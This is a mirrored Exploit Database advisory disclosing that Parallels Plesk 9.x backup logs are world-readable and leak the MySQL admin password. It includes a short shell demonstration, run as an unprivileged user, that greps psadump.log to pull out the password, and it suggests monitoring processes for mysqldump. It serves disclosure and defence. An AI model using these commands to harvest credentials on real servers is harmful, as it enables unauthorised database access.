Parallels PLESK 9.x – Insecure Permissions

• Exploit Database
• 13 阅读

• 作者： Nicolas Krassas
  日期： 2012-04-26
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18785/

• # Exploit Title: PLESK 9.x insecure directory permission ( admin password
  revealed )
  # Date: 25/04/2012
  # Author: Nicolas Krassas , twitter.com/dinosn
  # Software Link: www.*parallels*.com/*plesk*/
  # Version: 9.x
  # Tested on: ubuntu / centos
  
  During backup procedures, PLESK panel is keeping a detailed log of the
  process under /opt/psa/PMM/sessions in Debian/Ubuntu installations and
  /usr/local/psa/PMM/sessions in Centos under the directory with the current
  date.A detailed log file is created with the name psadump.log, with
  readable permissions for everyone.The file will reveal the admin password
  used from the backup process to dump the mysql databases from the sites
  being backed up.
  
  It's possible to locate data also under the sessions directory from
  incomplete/crashed backup sessions where the log files are not safely
  removed from the system.
  
  e.g.:
  
  $ id
  uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  $ cd /opt/psa/PMM/sessions
  $ ls -Fal
  total 32
  drwxr-xr-x8 root root 4096 2012-04-25 21:42 ./
  drwxr-xr-x 10 root root 4096 2009-12-03 22:07 ../
  drwxr-xr-x3 root root 4096 2012-04-25 22:12 2012-04-25-211250.973/
  $ cat 2012-04-25-211250.973/psadump.log | grep admin
  18:52:26 INFOExecuting bundle producer: '/usr/bin/mysqldump -h
  'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick --quote-names
  --add-drop-table --default-character-set=utf8 --set-charset 'DB'' in
  
  Old but I didn't see it listed, another way is to constantly monitor the
  system for the mysqldump process using a simple bash script to get the
  credentials as the process is running in the scheduled plesk backups.